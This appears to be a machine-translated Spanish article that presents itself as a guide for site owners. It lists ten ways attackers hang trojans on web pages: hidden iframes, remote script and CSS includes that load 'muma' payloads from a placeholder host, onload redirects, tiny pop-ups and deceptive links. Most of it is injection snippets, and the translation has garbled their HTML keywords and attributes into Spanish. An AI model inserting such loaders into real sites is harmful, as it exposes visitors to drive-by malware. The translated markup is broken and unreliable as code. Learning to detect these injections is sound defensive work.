Este artículo le indica los métodos que los delincuentes suelen utilizar para colgar troyanos en páginas web, de modo que pueda evitar sus propias páginas web. Siempre que detecte estos lugares que se utilizan a menudo para colgar troyanos, será fácil encontrar la ubicación. de los troyanos.
1: Caballo colgante con marco
<iframe src=ancho de dirección=0 alto=0></iframe>
Puede ingresar enlaces a sitios web maliciosos en la dirección, etc.
Dos: montaje de archivos js
Siempre que sea un archivo JS, puede modificarse de forma maliciosa y, por lo tanto, vincularse a código malicioso. Generalmente, es más probable que el código JS al que hace referencia todo el sitio esté vinculado a caballos de Troya para su detección. La parte izquierda o inferior del código JS. A los malos les gusta combinar código malicioso con Los códigos normales están ocultos con muchos espacios o retornos de carro, por lo que debes verificar si la página de códigos JS se ha extendido intencionalmente.
Tres: cifrado de deformación js
<lenguaje SCRIPT=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt se puede cambiar a cualquier sufijo
Cuatro: caballo colgado del cuerpo
<cuerpo onload=ventana.ubicación='dirección';></cuerpo>
Cinco: caballo escondido colgado
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
Seis: caballo colgado en CSS
cuerpo {
imagen de fondo: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
Este método es más despiadado y más difícil de detectar.
Siete: caballo colgante JAJA
<Idioma SCRIPT=javascript>
window.open (dirección, barra de herramientas = no, ubicación = no, directorios = no, estado = no, barra de menú = no, barras de desplazamiento = no, ancho = 1, altura = 1);
</script>
Ocho: disfraz de imagen
<html>
<iframe src=网马地址 alto=0 ancho=0></iframe>
<img src=dirección de la imagen></center>
</html>
Nueve: llamada disfrazada
<filas del conjunto de marcos=444,0 columnas=*>
<frame src=Abrir página web fraborder=sin desplazamiento=auto noresize marginwidth=0margingheight=0>
<frame src=网马地址 frameborder=sin desplazamiento=sin noresize marginwidth=0margingheight=0>
</conjunto de marcos>
Diez: engaño avanzado
<a href=http://www.163.com (confunde la dirección de conexión y muestra que esta dirección apunta a la dirección del troyano) onMouseOver=www_163_com(); devuelve verdadero;> Contenido que se mostrará en la página</a>
<Lenguaje SCRIPT=JavaScript>
función www_163_com ()
{
var url=dirección neta del caballo;
open(url,NuevaVentana,barra de herramientas=no,ubicación=no,directorios=no,estado=no,barra de menú=no,barras de desplazamiento=no,resizable=no,copyhistory=yes,ancho=800,alto=600,izquierda=10, arriba=10);
}
</SCRIPT>